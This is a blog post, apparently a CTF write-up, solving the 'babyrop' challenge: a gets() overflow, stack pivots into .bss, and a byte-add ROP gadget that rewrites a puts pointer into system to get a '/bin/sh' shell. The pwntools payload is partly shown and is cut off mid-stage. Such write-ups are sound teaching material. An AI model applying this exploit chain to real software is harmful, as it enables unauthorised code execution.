<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />


  <script type="text/javascript" id="MathJax-script" async
    src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js">
  </script>
<script type="text/javascript">
window.MathJax = {
  tex: {
    inlineMath: [['$', '$'], ['\\(', '\\)']],
    displayMath: [['$$', '$$'], ['\\[', '\\]']]
  },
  chtml: {
    scale: 1.10   /* Increase font size: 1.0 = default, 1.5 = 150% */
  }
};
</script>
  <title>smileyctf/babyrop</title><!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v3.10.0" />
<meta property="og:title" content="smileyctf/babyrop" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="recommended listening for this post is gips by sheena ringo." />
<meta property="og:description" content="recommended listening for this post is gips by sheena ringo." />
<link rel="canonical" href="http://localhost:4000/2026/02/08/stupidpwn.html" />
<meta property="og:url" content="http://localhost:4000/2026/02/08/stupidpwn.html" />
<meta property="og:site_name" content="wrenches" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2026-02-08T05:40:00+08:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="smileyctf/babyrop" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2026-02-08T05:40:00+08:00","datePublished":"2026-02-08T05:40:00+08:00","description":"recommended listening for this post is gips by sheena ringo.","headline":"smileyctf/babyrop","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2026/02/08/stupidpwn.html"},"url":"http://localhost:4000/2026/02/08/stupidpwn.html"}</script>
<!-- End Jekyll SEO tag -->
<link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="wrenches" /><link rel="shortcut icon" type="image/x-icon" href="" />
  <link rel="stylesheet" href="/assets/css/main.css" />
  <link rel="stylesheet" href="/assets/css/syntax.css">

</head>
<body a="dark">
    <main class="page-content" aria-label="Content">
      <div class="w">
        <a href="/"></a><article>
  <p class="post-meta">
    <time datetime="2026-02-08 05:40:00 +0800">2026-02-08 05:40:00 +0800</time>
  </p>
  
  <h1>smileyctf/babyrop</h1>

  <p>recommended listening for this post is <a href="https://www.youtube.com/watch?v=zldBTSx9JpE">gips by sheena ringo.</a></p>

<p><img src="https://i.redd.it/xqk7cg8tacie1.gif" alt="yup" /></p>

<p>cool challenge which took me around 3 hours to solve using what might actually be one of the dumbest solutions of all time! (tl;dr byte ptr add gadget and a DREAM)</p>

<p>the challenge is a simple minimal ROP challenge. after decompiling the main function we get this:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="kr">__fastcall</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="n">envp</span><span class="p">)</span>
<span class="p">{</span>
  <span class="kt">char</span> <span class="n">s</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="c1">// [rsp+0h] [rbp-20h] BYREF</span>

  <span class="n">setbuf</span><span class="p">(</span><span class="n">_bss_start</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
  <span class="n">memset</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">s</span><span class="p">));</span>
  <span class="n">gets</span><span class="p">(</span><span class="n">s</span><span class="p">);</span>
  <span class="n">print</span><span class="p">(</span><span class="n">s</span><span class="p">);</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>essentially, we have a <code class="language-plaintext highlighter-rouge">gets()</code> call, so we can trivially overwrite the return address of this function call for ROP. the problem is we are not exactly spoiled for choice: there are very few usable gadgets to work with. however, checksec reveals that the binary has no PIE, no canary, but.. full RELRO. D:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">wrenches</span><span class="err">@</span><span class="n">kitty</span> <span class="p">(</span><span class="o">~/</span><span class="n">work</span><span class="o">/</span><span class="n">pwn</span><span class="o">/</span><span class="n">babyrop</span><span class="p">)</span> <span class="o">&gt;</span> <span class="n">checksec</span> <span class="o">--</span><span class="n">file</span><span class="o">=</span><span class="n">vuln_patched</span>
<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="err">'</span><span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">wrenches</span><span class="o">/</span><span class="n">work</span><span class="o">/</span><span class="n">pwn</span><span class="o">/</span><span class="n">babyrop</span><span class="o">/</span><span class="n">vuln_patched</span><span class="err">'</span>
    <span class="n">Arch</span><span class="o">:</span>       <span class="n">amd64</span><span class="o">-</span><span class="mi">64</span><span class="o">-</span><span class="n">little</span>
    <span class="n">RELRO</span><span class="o">:</span>      <span class="n">Full</span> <span class="n">RELRO</span>
    <span class="n">Stack</span><span class="o">:</span>      <span class="n">No</span> <span class="n">canary</span> <span class="n">found</span>
    <span class="n">NX</span><span class="o">:</span>         <span class="n">NX</span> <span class="n">enabled</span>
    <span class="n">PIE</span><span class="o">:</span>        <span class="n">No</span> <span class="n">PIE</span> <span class="p">(</span><span class="mh">0x3fe000</span><span class="p">)</span>
    <span class="n">RUNPATH</span><span class="o">:</span>    <span class="n">b</span><span class="sc">'.'</span>
    <span class="n">SHSTK</span><span class="o">:</span>      <span class="n">Enabled</span>
    <span class="n">IBT</span><span class="o">:</span>        <span class="n">Enabled</span>
    <span class="n">Stripped</span><span class="o">:</span>   <span class="n">No</span>
</code></pre></div></div>

<p>at this point it behooves us to look into the assembly ( we will have to stare at a lot of assembly for the entire duration of this challenge xd)</p>

<p>disassembling the main function reveals a few nice things.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Dump</span> <span class="n">of</span> <span class="n">assembler</span> <span class="n">code</span> <span class="k">for</span> <span class="n">function</span> <span class="n">main</span><span class="o">:</span>
   <span class="mh">0x00000000004011cf</span> <span class="o">&lt;+</span><span class="mi">0</span><span class="o">&gt;:</span>	<span class="n">endbr64</span>
   <span class="mh">0x00000000004011d3</span> <span class="o">&lt;+</span><span class="mi">4</span><span class="o">&gt;:</span>	<span class="n">push</span>   <span class="n">rbp</span>
   <span class="mh">0x00000000004011d4</span> <span class="o">&lt;+</span><span class="mi">5</span><span class="o">&gt;:</span>	<span class="n">mov</span>    <span class="n">rbp</span><span class="p">,</span><span class="n">rsp</span>
   <span class="mh">0x00000000004011d7</span> <span class="o">&lt;+</span><span class="mi">8</span><span class="o">&gt;:</span>	<span class="n">sub</span>    <span class="n">rsp</span><span class="p">,</span><span class="mh">0x20</span>
   <span class="mh">0x00000000004011db</span> <span class="o">&lt;+</span><span class="mi">12</span><span class="o">&gt;:</span>	<span class="n">mov</span>    <span class="n">rax</span><span class="p">,</span><span class="n">QWORD</span> <span class="n">PTR</span> <span class="p">[</span><span class="n">rip</span><span class="o">+</span><span class="mh">0x2e36</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0x404018</span> <span class="o">&lt;</span><span class="n">stdout</span><span class="err">@</span><span class="n">GLIBC_2</span><span class="p">.</span><span class="mi">2</span><span class="p">.</span><span class="mi">5</span><span class="o">&gt;</span>
   <span class="mh">0x00000000004011e2</span> <span class="o">&lt;+</span><span class="mi">19</span><span class="o">&gt;:</span>	<span class="n">mov</span>    <span class="n">esi</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="mh">0x00000000004011e7</span> <span class="o">&lt;+</span><span class="mi">24</span><span class="o">&gt;:</span>	<span class="n">mov</span>    <span class="n">rdi</span><span class="p">,</span><span class="n">rax</span>
   <span class="mh">0x00000000004011ea</span> <span class="o">&lt;+</span><span class="mi">27</span><span class="o">&gt;:</span>	<span class="n">call</span>   <span class="mh">0x401060</span> <span class="o">&lt;</span><span class="n">setbuf</span><span class="err">@</span><span class="n">plt</span><span class="o">&gt;</span>
   <span class="mh">0x00000000004011ef</span> <span class="o">&lt;+</span><span class="mi">32</span><span class="o">&gt;:</span>	<span class="n">lea</span>    <span class="n">rax</span><span class="p">,[</span><span class="n">rbp</span><span class="o">-</span><span class="mh">0x20</span><span class="p">]</span>
   <span class="mh">0x00000000004011f3</span> <span class="o">&lt;+</span><span class="mi">36</span><span class="o">&gt;:</span>	<span class="n">mov</span>    <span class="n">edx</span><span class="p">,</span><span class="mh">0x20</span>
   <span class="mh">0x00000000004011f8</span> <span class="o">&lt;+</span><span class="mi">41</span><span class="o">&gt;:</span>	<span class="n">mov</span>    <span class="n">esi</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="mh">0x00000000004011fd</span> <span class="o">&lt;+</span><span class="mi">46</span><span class="o">&gt;:</span>	<span class="n">mov</span>    <span class="n">rdi</span><span class="p">,</span><span class="n">rax</span>
   <span class="mh">0x0000000000401200</span> <span class="o">&lt;+</span><span class="mi">49</span><span class="o">&gt;:</span>	<span class="n">call</span>   <span class="mh">0x401070</span> <span class="o">&lt;</span><span class="n">memset</span><span class="err">@</span><span class="n">plt</span><span class="o">&gt;</span>
   <span class="mh">0x0000000000401205</span> <span class="o">&lt;+</span><span class="mi">54</span><span class="o">&gt;:</span>	<span class="n">lea</span>    <span class="n">rax</span><span class="p">,[</span><span class="n">rbp</span><span class="o">-</span><span class="mh">0x20</span><span class="p">]</span>
   <span class="mh">0x0000000000401209</span> <span class="o">&lt;+</span><span class="mi">58</span><span class="o">&gt;:</span>	<span class="n">mov</span>    <span class="n">rdi</span><span class="p">,</span><span class="n">rax</span>
   <span class="mh">0x000000000040120c</span> <span class="o">&lt;+</span><span class="mi">61</span><span class="o">&gt;:</span>	<span class="n">call</span>   <span class="mh">0x401183</span> <span class="o">&lt;</span><span class="n">gets</span><span class="o">&gt;</span>
   <span class="mh">0x0000000000401211</span> <span class="o">&lt;+</span><span class="mi">66</span><span class="o">&gt;:</span>	<span class="n">mov</span>    <span class="n">rdx</span><span class="p">,</span><span class="n">QWORD</span> <span class="n">PTR</span> <span class="p">[</span><span class="n">rip</span><span class="o">+</span><span class="mh">0x2df8</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0x404010</span> <span class="o">&lt;</span><span class="n">print</span><span class="o">&gt;</span>
   <span class="mh">0x0000000000401218</span> <span class="o">&lt;+</span><span class="mi">73</span><span class="o">&gt;:</span>	<span class="n">lea</span>    <span class="n">rax</span><span class="p">,[</span><span class="n">rbp</span><span class="o">-</span><span class="mh">0x20</span><span class="p">]</span>
   <span class="mh">0x000000000040121c</span> <span class="o">&lt;+</span><span class="mi">77</span><span class="o">&gt;:</span>	<span class="n">mov</span>    <span class="n">rdi</span><span class="p">,</span><span class="n">rax</span>
   <span class="mh">0x000000000040121f</span> <span class="o">&lt;+</span><span class="mi">80</span><span class="o">&gt;:</span>	<span class="n">call</span>   <span class="n">rdx</span>
   <span class="mh">0x0000000000401221</span> <span class="o">&lt;+</span><span class="mi">82</span><span class="o">&gt;:</span>	<span class="n">mov</span>    <span class="n">eax</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="mh">0x0000000000401226</span> <span class="o">&lt;+</span><span class="mi">87</span><span class="o">&gt;:</span>	<span class="n">leave</span>
   <span class="mh">0x0000000000401227</span> <span class="o">&lt;+</span><span class="mi">88</span><span class="o">&gt;:</span>	<span class="n">ret</span>
<span class="n">End</span> <span class="n">of</span> <span class="n">assembler</span> <span class="n">dump</span><span class="p">.</span>
</code></pre></div></div>

<p>first things first: <code class="language-plaintext highlighter-rouge">gets()</code> is called on a buffer relative to <code class="language-plaintext highlighter-rouge">rbp</code>. because of the <code class="language-plaintext highlighter-rouge">leave; ret</code> function epilogue at the bottom, we can directly control <code class="language-plaintext highlighter-rouge">rbp</code>. this means that if we pivot the stack carefully, we can overwrite whatever we want.</p>

<p>second things second: indirect call at <code class="language-plaintext highlighter-rouge">call rdx...</code>?</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>   <span class="mh">0x0000000000401211</span> <span class="o">&lt;+</span><span class="mi">66</span><span class="o">&gt;:</span>	<span class="n">mov</span>    <span class="n">rdx</span><span class="p">,</span><span class="n">QWORD</span> <span class="n">PTR</span> <span class="p">[</span><span class="n">rip</span><span class="o">+</span><span class="mh">0x2df8</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0x404010</span> <span class="o">&lt;</span><span class="n">print</span><span class="o">&gt;</span>
   <span class="mh">0x0000000000401218</span> <span class="o">&lt;+</span><span class="mi">73</span><span class="o">&gt;:</span>	<span class="n">lea</span>    <span class="n">rax</span><span class="p">,[</span><span class="n">rbp</span><span class="o">-</span><span class="mh">0x20</span><span class="p">]</span>
   <span class="mh">0x000000000040121c</span> <span class="o">&lt;+</span><span class="mi">77</span><span class="o">&gt;:</span>	<span class="n">mov</span>    <span class="n">rdi</span><span class="p">,</span><span class="n">rax</span>
   <span class="mh">0x000000000040121f</span> <span class="o">&lt;+</span><span class="mi">80</span><span class="o">&gt;:</span>	<span class="n">call</span>   <span class="n">rdx</span>
   <span class="mh">0x0000000000401221</span> <span class="o">&lt;+</span><span class="mi">82</span><span class="o">&gt;:</span>	<span class="n">mov</span>    <span class="n">eax</span><span class="p">,</span><span class="mh">0x0</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">rdx</code> is loaded from a fixed region in memory, but this is weird because it’s not an area in the GOT. in fact, the function pointer <code class="language-plaintext highlighter-rouge">print</code> is actually in writable memory in <code class="language-plaintext highlighter-rouge">.bss</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">gef</span><span class="o">&gt;</span> <span class="n">vmmap</span> <span class="mh">0x404000</span>
<span class="p">[</span> <span class="n">Legend</span><span class="o">:</span> <span class="n">Code</span> <span class="o">|</span> <span class="n">Heap</span> <span class="o">|</span> <span class="n">Stack</span> <span class="o">|</span> <span class="n">Writable</span> <span class="o">|</span> <span class="n">ReadOnly</span> <span class="o">|</span> <span class="n">None</span> <span class="o">|</span> <span class="n">RWX</span> <span class="p">]</span>
<span class="n">Start</span>              <span class="n">End</span>                <span class="n">Size</span>               <span class="n">Offset</span>             <span class="n">Perm</span> <span class="n">Path</span>
<span class="mh">0x0000000000404000</span> <span class="mh">0x0000000000405000</span> <span class="mh">0x0000000000001000</span> <span class="mh">0x0000000000005000</span> <span class="n">rw</span><span class="o">-</span> <span class="p">[</span><span class="n">hey</span> <span class="n">look</span> <span class="n">at</span> <span class="n">that</span> <span class="n">its</span> <span class="n">rw</span><span class="o">-</span><span class="p">]</span> <span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">wrenches</span><span class="o">/</span><span class="n">work</span><span class="o">/</span><span class="n">pwn</span><span class="o">/</span><span class="n">babyrop</span><span class="o">/</span><span class="n">vuln_patched</span> <span class="o">+</span><span class="mh">0x0</span>
<span class="n">gef</span><span class="o">&gt;</span>
</code></pre></div></div>

<p>this means that we can indeed overwrite this pointer and do arbitrary calls. the problem is, we would need a libc leak to find where <code class="language-plaintext highlighter-rouge">system()</code> is in libc.</p>

<p>from here, i tried seeing if we could pivot the stack such that we could call <code class="language-plaintext highlighter-rouge">puts()</code> on itself (hence leaking the pointer), but i had no such luck with this. i think this is definitely possible and a <em>lot</em> easier than the method i went with, but if i did the easy simple route this wouldnt be funny enough to make a writeup on</p>

<p>anyways, what did i actually do? let’s find out together! i will highlight the gadgets that i have used, from the ROPgadget output:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mh">0x000000000040115d</span> <span class="o">:</span> <span class="n">pop</span> <span class="n">rbp</span> <span class="p">;</span> <span class="n">ret</span>
<span class="mh">0x000000000040117e</span> <span class="o">:</span> <span class="n">pop</span> <span class="n">rcx</span> <span class="p">;</span> <span class="n">ret</span>
<span class="mh">0x000000000040115b</span> <span class="o">:</span> <span class="n">add</span> <span class="n">byte</span> <span class="n">ptr</span> <span class="p">[</span><span class="n">rcx</span><span class="p">],</span> <span class="n">al</span> <span class="p">;</span> <span class="n">pop</span> <span class="n">rbp</span> <span class="p">;</span> <span class="n">ret</span>
<span class="mh">0x00000000004011ca</span> <span class="o">:</span> <span class="n">mov</span> <span class="n">eax</span><span class="p">,</span> <span class="n">dword</span> <span class="n">ptr</span> <span class="p">[</span><span class="n">rbp</span> <span class="o">-</span> <span class="mi">4</span><span class="p">]</span> <span class="p">;</span> <span class="n">leave</span> <span class="p">;</span> <span class="n">ret</span>
</code></pre></div></div>

<p>mm, yes, a <code class="language-plaintext highlighter-rouge">pop rbp</code>, a <code class="language-plaintext highlighter-rouge">pop rcx</code>, and.. an <code class="language-plaintext highlighter-rouge">add byte ptr...</code> erm.. yup..</p>

<p>so, the key concept here is that we can use the add gadget to increment our writable pointer to <code class="language-plaintext highlighter-rouge">puts</code> in memory without ever having to actually leak the value of <code class="language-plaintext highlighter-rouge">puts</code>. note the snippet below, which shows that all but the last 3 bytes of the <code class="language-plaintext highlighter-rouge">puts</code> and <code class="language-plaintext highlighter-rouge">system</code> ptrs are the same.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">gef</span><span class="o">&gt;</span> <span class="n">x</span><span class="o">/</span><span class="mi">4</span><span class="n">g</span> <span class="mh">0x404010</span>
<span class="mh">0x404010</span> <span class="o">&lt;</span><span class="n">print</span><span class="o">&gt;:</span>	<span class="mh">0x7ffff7c87be0</span>	<span class="mh">0x7ffff7e045c0</span>
<span class="mh">0x404020</span> <span class="o">&lt;</span><span class="n">completed</span><span class="o">&gt;:</span>	<span class="mh">0x0</span>	<span class="mh">0x0</span>
<span class="n">gef</span><span class="o">&gt;</span> <span class="n">p</span> <span class="n">puts</span>
<span class="err">$</span><span class="mi">1</span> <span class="o">=</span> <span class="p">{</span><span class="o">&lt;</span><span class="n">text</span> <span class="n">variable</span><span class="p">,</span> <span class="n">no</span> <span class="n">debug</span> <span class="n">info</span><span class="o">&gt;</span><span class="p">}</span> <span class="mh">0x7ffff7c87be0</span> <span class="o">&lt;</span><span class="n">puts</span><span class="o">&gt;</span>
<span class="n">gef</span><span class="o">&gt;</span> <span class="n">p</span> <span class="n">system</span>
<span class="err">$</span><span class="mi">2</span> <span class="o">=</span> <span class="p">{</span><span class="o">&lt;</span><span class="n">text</span> <span class="n">variable</span><span class="p">,</span> <span class="n">no</span> <span class="n">debug</span> <span class="n">info</span><span class="o">&gt;</span><span class="p">}</span> <span class="mh">0x7ffff7c58750</span> <span class="o">&lt;</span><span class="n">system</span><span class="o">&gt;</span>
</code></pre></div></div>

<p>so, if we just modify each of those 3 bytes with three separate rop chain stages, we can convert <code class="language-plaintext highlighter-rouge">puts</code> into <code class="language-plaintext highlighter-rouge">system</code> and win! yup!</p>

<p>of course, we need to control <code class="language-plaintext highlighter-rouge">al</code>, which is why we have that <code class="language-plaintext highlighter-rouge">mov eax, dword ptr [rbp - 4]</code> gadget. recall that we can just pivot our stack to .bss, write whatever values we want there, and then use a <code class="language-plaintext highlighter-rouge">pop rbp</code> in conjunction with this <code class="language-plaintext highlighter-rouge">mov</code> gadget such that we move our needed values into <code class="language-plaintext highlighter-rouge">eax</code>.</p>

<p>( we also need to control <code class="language-plaintext highlighter-rouge">rcx</code>, but we have a direct <code class="language-plaintext highlighter-rouge">pop rcx ; ret</code> gadget gifted to us by the smileyctf gods so this is trivial to use )</p>

<p>however! astute readers may have noticed that this <code class="language-plaintext highlighter-rouge">mov eax, dword ptr [rbp - 4]</code> is not all sunshine and rainbows!! let’s look at it closer:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mh">0x00000000004011ca</span> <span class="o">:</span> <span class="n">mov</span> <span class="n">eax</span><span class="p">,</span> <span class="n">dword</span> <span class="n">ptr</span> <span class="p">[</span><span class="n">rbp</span> <span class="o">-</span> <span class="mi">4</span><span class="p">]</span> <span class="p">;</span> <span class="n">leave</span> <span class="p">;</span> <span class="n">ret</span>
</code></pre></div></div>

<p>aw FUCK kena <code class="language-plaintext highlighter-rouge">leave</code></p>

<p>soo uhh yeah this <code class="language-plaintext highlighter-rouge">leave (mov rsp, rbp ; pop rbp)</code> instruction fucking sucks, <em>because</em> we have to pivot <code class="language-plaintext highlighter-rouge">rbp</code> to control our <code class="language-plaintext highlighter-rouge">rax</code> value, our <code class="language-plaintext highlighter-rouge">rsp</code> will end up <code class="language-plaintext highlighter-rouge">0x04</code> bytes away from the value where <code class="language-plaintext highlighter-rouge">rax</code> is stored, meaning that the so-called ‘flow’ of our ROP chain will be broken up by these intermittent and uncontrollable ‘pivots’ elsewhere into memory.</p>

<p>let’s illustrate what this actually means:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">gef</span><span class="o">&gt;</span> <span class="n">p</span> <span class="err">$</span><span class="n">rsp</span>
<span class="err">$</span><span class="mi">1</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="mh">0x404930</span>
<span class="n">gef</span><span class="o">&gt;</span> <span class="n">p</span> <span class="err">$</span><span class="n">rbp</span>
<span class="err">$</span><span class="mi">2</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="mh">0x404118</span>

<span class="o">--</span> <span class="n">instrs</span> <span class="o">--</span> 
<span class="o">&lt;</span><span class="n">gets</span><span class="o">+</span><span class="mh">0x47</span><span class="o">&gt;</span>   <span class="n">mov</span>    <span class="n">eax</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">PTR</span> <span class="p">[</span><span class="n">rbp</span> <span class="o">-</span> <span class="mh">0x4</span><span class="p">]</span>
<span class="o">&lt;</span><span class="n">gets</span><span class="o">+</span><span class="mh">0x4a</span><span class="o">&gt;</span>   <span class="n">leave</span>
<span class="o">&lt;</span><span class="n">gets</span><span class="o">+</span><span class="mh">0x4b</span><span class="o">&gt;</span>   <span class="n">ret</span>

<span class="o">--</span> <span class="n">fields</span> <span class="n">near</span> <span class="n">rbp</span> <span class="o">--</span>
<span class="n">gef</span><span class="o">&gt;</span> <span class="n">x</span><span class="o">/</span><span class="mi">16</span><span class="n">g</span> <span class="err">$</span><span class="n">rbp</span><span class="o">-</span><span class="mh">0x08</span>
<span class="mh">0x404110</span><span class="o">:</span> <span class="mi">0</span><span class="n">x</span><span class="p">[</span><span class="mi">7000</span><span class="p">]</span><span class="mo">000000</span> <span class="o">&lt;-</span> <span class="n">that</span> <span class="n">will</span> <span class="n">get</span> <span class="n">mov</span><span class="err">'</span><span class="n">d</span> <span class="n">into</span> <span class="n">rax</span>	
<span class="mh">0x404118</span><span class="o">:</span> <span class="mh">0x0</span> <span class="o">&lt;-</span> <span class="n">when</span> <span class="n">we</span> <span class="k">do</span> <span class="n">mov</span> <span class="n">rsp</span><span class="p">;</span> <span class="n">rbp</span><span class="p">,</span> <span class="n">this</span> <span class="n">is</span> <span class="n">where</span> <span class="n">the</span> <span class="n">new</span> <span class="n">rsp</span> <span class="n">will</span> <span class="n">go</span>
<span class="mh">0x404120</span><span class="o">:</span> <span class="mh">0x40115b</span> <span class="o">&lt;-</span> <span class="n">next</span> <span class="n">rip</span> <span class="p">(</span><span class="n">after</span> <span class="n">ret</span><span class="p">)</span> <span class="p">...</span>
<span class="p">...</span> <span class="n">chain</span> <span class="n">continues</span>
</code></pre></div></div>

<p>naturally, if we try to continue the chain, eventually we will run into another <code class="language-plaintext highlighter-rouge">mov rsp, rbp</code>, and the nice chain of retaddrs in our stack will get disrupted, which makes our actual exploit really annoying to write!</p>

<p>i circumvented this by simply writing the payload in 3 stages:</p>

<p>first stage: pivot:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># pivot stack into bss first, preparatory measure
</span><span class="n">p1</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x10</span><span class="s">'</span> <span class="o">*</span> <span class="mh">0x20</span>
<span class="n">p1</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404100</span><span class="p">)</span> <span class="c1"># bss
</span><span class="n">p1</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x401205</span><span class="p">)</span> <span class="c1"># this points us back to our write
</span>
<span class="n">p</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">p1</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span>
</code></pre></div></div>

<p>standard stack pivot, nothing to see here. keep in mind that because we have now shifted <code class="language-plaintext highlighter-rouge">rbp</code> to <code class="language-plaintext highlighter-rouge">0x404100</code>, our next write will be to <code class="language-plaintext highlighter-rouge">0x4040e0</code></p>

<p>second stage:</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">p2</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x20</span><span class="s">'</span> <span class="o">*</span> <span class="mh">0x20</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404900</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x401205</span><span class="p">)</span> <span class="c1"># ret back to read
</span></code></pre></div></div>

<p>another pivot to <code class="language-plaintext highlighter-rouge">0x404900</code>, which is farther up in writable memory (so when the stack grows down we wont hit a nasty segfault), and another address back to read. and then.. uhhh</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># 0x404110; step 1
</span><span class="n">p2</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">4</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mh">0x70</span><span class="p">)</span> <span class="c1"># byte that gets added
</span><span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># mov rsp, rbp, pop rbp
</span><span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">ADD_PTR_RCX</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404228</span><span class="p">)</span> <span class="c1"># this gadget also has a pop rbp
# and then do it all over
</span><span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">POP_RCX</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404011</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">MOV_EAX</span><span class="p">)</span>
</code></pre></div></div>

<p>essentially, we make use of the boundless <code class="language-plaintext highlighter-rouge">gets()</code> write and just write the rop chains before they even get executed. we prepare the byte that gets added, the next values of rbp, the next values of rcx, and then call our <code class="language-plaintext highlighter-rouge">mov eax</code> gadget again (which as we recall, will shift our stack to somewhere else in memory). where is that somewhere else?</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="n">p2</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'/bin/sh</span><span class="se">\x00</span><span class="s">'</span> <span class="c1"># yeah just fucki just put it anywhere wh gives a shit
</span><span class="n">p2</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\xAA</span><span class="s">'</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x140</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">p2</span><span class="p">))</span> <span class="c1"># pad
</span>
<span class="c1"># 0x404220
</span><span class="n">p2</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">4</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mh">0x0c</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">ADD_PTR_RCX</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404338</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">POP_RCX</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x404012</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">MOV_EAX</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\xBB</span><span class="s">'</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x250</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">p2</span><span class="p">))</span>

<span class="c1"># 0x404330
</span><span class="n">p2</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">4</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mh">0xfd</span><span class="p">)</span>
<span class="n">p2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
